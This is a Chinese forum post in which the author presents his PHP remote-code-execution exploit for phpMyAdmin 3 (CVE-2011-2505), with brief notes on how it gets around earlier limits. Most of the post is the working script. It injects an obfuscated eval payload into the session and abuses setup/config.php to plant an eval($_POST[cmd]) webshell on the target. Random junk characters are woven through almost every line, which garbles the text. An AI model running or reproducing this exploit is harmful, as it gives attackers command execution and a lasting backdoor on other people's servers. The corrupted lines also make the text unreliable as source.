最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。$ i* Q f+ y+ M) t1 C& K
5 p! A# I/ d8 |% a1 {
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
' w V& ~9 H/ n9 ?+ K# W' A. J1 t; w3 H8 T3 l
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:1 Z/ M |3 h3 Z
一是session.auto_start = 1;
; B, A! m: q- j二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。0 z& Y( @; A( Z/ w2 ?$ O
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
/ \' p4 f0 e) a8 l
& A& y0 x: }( D( j在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
3 ?' z6 @( `$ O4 e x0 b' q% C; h! W7 V. Z, s
于是写了这个php版本的exp,代码如下:
9 e( z) S( n8 J' t/ ^% F. c) B# W! e: R8 }3 r% R# F& P
#!/usr/bin/php0 W9 }: g+ s4 F3 \, R; ` R
<?php
2 ` z j+ V! J1 G- A# bprint_r('. |; {4 F. a8 f5 A, V7 h9 f# e
+---------------------------------------------------------------------------+0 A4 n, u6 A; v1 q" Y1 ]$ d+ @
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
9 o, f4 F* \; H' p+ B0 P3 I0 sby oldjun(www.oldjun.com)6 Q' D0 I3 h+ D7 n2 ^; s1 p: J
welcome to www.t00ls.net* J$ g. t$ h: ^2 O
mail: oldjun@gmail.com
. P7 I+ V, q, a0 W/ e4 qAssigned CVE id: CVE-2011-2505' i7 p) \; F5 j; e# L0 ]
+---------------------------------------------------------------------------+( G4 h6 E) y8 a
');
. @6 R2 d2 y- o, I; l1 Z" a- V4 W- L+ ]& m6 I
/**
$ P8 d( a9 H' o a * working when the directory:"config" exists and is writeable.
& d: Z* c: r$ U3 b b**/
; r6 I; x6 E# m# Q. u4 q; f/ C. Q! T: y
: D) X; j- |, |" Z7 z& sif ($argc < 3) {
6 U$ h: Z G1 @1 t2 J. F print_r('$ X. D1 S2 i4 c
+---------------------------------------------------------------------------+
& s4 _" H8 i, G$ rUsage: php '.$argv[0].' host path) @" c* H% [1 l( X
host: target server (ip/hostname)$ \/ v1 t* k2 j% w2 J$ U
path: path to pma3
( W' [! D: Z4 ` HExample: C' o4 P( i; r3 e& J+ Z
php '.$argv[0].' localhost /pma/$ ^$ h% k2 |( ~0 _" @1 P& R# B) T
+---------------------------------------------------------------------------+* Q( V" {, [5 P/ h: H. k) p
');
! C7 y: W4 g& v0 b- T exit;
* ?( l: x# ]' L) }, g0 N" m}6 B2 A2 \8 G# z8 u0 h/ @- V
% ]0 W2 u5 s! { Y, u4 p$host = $argv[1];
3 n4 u! D) M5 D3 o$path = $argv[2];: J& e8 L9 U& q: }7 Q: J
2 o$ R6 F$ S$ t7 F& y& Z
/**
; p" h) v+ O% d. I1 ^- ] * Try to determine if the directory:"config" exists
) O& Q7 d$ d3 m**/
- Y, E0 M. l. w$ c) @ r, Oecho "[+] Try to determine if the directory:config exists....\n";# Q6 n- Q2 f* R* c# q. r
$returnstr=php_request('config/');
% C, G% }+ z- d2 pif(strpos($returnstr,'404')){
1 }: F I' v0 [# D( d( d exit("[-] Exploit Failed! The directory:config do not exists!\n");
: G! s9 ?2 H; u7 n8 h7 Y- B+ ^; ?}
$ W8 Q' P! x1 [( ]% d) R8 ]" h4 k2 j; Q0 O. L! I; [& n" K! I
/**3 g u S+ B: z/ a3 Z- D- \
* Try to get token and sessionid0 r* b% @' }# v
**/7 G' k1 q) @# n/ F& L% P0 s
echo "[+] Try to get token and sessionid....\n";
: v, z3 T9 u( V7 E2 |$result=php_request('index.php');) a7 q; L. l# p, g
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
: I- P2 ?& K: w6 j* l$token=$resp[3];
& k- X: w* U" ^' }$sessionid=$resp[1];
* V, d$ A& A3 H- \1 H" r% zif($token && $sessionid){
' N8 P2 }" x' c% b' V echo "[+] token token\n";
z Q$ P. E8 \ echo "[+] Session IDsessionid\n";/ _5 C" t4 T& c, [( k
}else{
# L7 W7 B v$ I5 D2 k. f3 R& a exit("[-] Can't get token and Session ID,Exploit Failed!\n");$ C \! v& Y1 h" K6 ~# k2 @* O5 N
}
. m2 f9 u4 Y9 h3 B0 O- }
/ o4 O) Q% {2 c6 T6 r( l) ]. j/**1 R u* }- ]; ^* b" D0 r! v I2 K( e+ f
* Try to insert shell into session/ q0 w% f% a3 f* J, W
**/
( h8 B% c7 x" e, f, R/ w4 mecho "[+] Try to insert shell into session....\n";$ a) O# b% p8 W$ F
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.& k, X' N) J: Z8 m( ]+ Q! o
; i0 I s1 @. x/ ~' w4 b9 C/**
& e, E( C8 T; C9 b" ^7 { * Try to create webshell @$ l9 X( L! m( a Y \
**/- a1 [, f+ N0 d; U
echo "[+] Try to create webshell....\n";/ n- B* n! F2 a* T3 |" A
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
* r3 U1 Z4 a; f! Y! [ ~9 J/**
' V7 u. l& D% T2 w. E. B * Try to check if the webshell was created successfully9 S% O- n+ [: K, n- } Q
**/! z/ |- R# ]+ R8 e) h
echo "[+] Try to check if the webshell was created successfully....\n";2 Y8 v( } X9 _: ]. z l
$content=php_request('config/config.inc.php');" y ]! U7 s: K1 g
if(strpos($content,'t00ls')){6 t- E* c0 |* D A/ V
echo "[+] Congratulations! Expoilt successfully....\n";1 T2 T# `5 m# J' Z
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";& h. |% ^0 z6 k+ C
}else{4 ]/ M, c, v( V! `
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
" a: ]1 G. |& j5 x0 C& b: }5 ~}
# p6 x6 t; t8 B6 k. m
D% s1 N' [- r5 X6 b/ A. Lfunction php_request($url,$data='',$cookie=''){
" r0 q1 H1 e5 N. }1 `3 q, D& h global $host, $path;
; u/ J. J8 p$ Z, j& [ 0 T# h. D l* ~4 Y
$method=$data?'POST':'GET';# {9 f5 M% d& q7 C4 s
% V+ L6 g' {! K8 ?* o3 m
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
# X! {& C+ c1 Z1 x i8 ]) B $packet .= "Accept: */*\r\n";3 _. R( N* q0 ^! e9 s( k( L/ t
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; [, `! O& C! }5 K, T
$packet .= "Host: $host\r\n";, d8 U9 K: J2 W- a: F; U
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";! k$ y4 A" r- }% T
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";$ [6 e# ?3 E1 j. d' f( ~9 l
$packet .= $cookie?"Cookie: $cookie\r\n":"";5 j. s4 }8 ^/ O5 R1 J, t
$packet .= "Connection: Close\r\n\r\n";
8 U0 {) v6 n* r. V0 x; k f $packet .= $data?$data:"";
& ?* Q. k/ \! k9 R' j! c' F9 ~0 k4 @1 ]& U, M, G
$fp = fsockopen(gethostbyname($host), 80);
' X% }# s3 T2 P. T0 O( l( ~( Q8 Z) N if (!$fp) {5 i0 ~8 O1 p5 Z& n, {# p
echo 'No response from '.$host; die;
& R( ^- E6 |! B: g }' M. r& P* ?* X2 N3 S- @
fputs($fp, $packet);
+ }: i* \7 K, w2 v+ |! a4 Q( Q6 q1 G0 E
$resp = '';
2 I: ]4 K( P7 p# H1 I! s$ _0 p# f- |7 Z
while ($fp && !feof($fp))
( Y( ?( P7 z/ L% D T; R6 Q $resp .= fread($fp, 1024);
- R5 g; g9 H% a% O0 w/ n7 \' F7 \) V& _' `
return $resp; F& z9 J6 p; A6 M
}
+ I4 z5 M/ O) u . v7 J0 t4 f% N' v
?> ; M# ]$ w8 ^4 l0 [# [$ |6 H
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对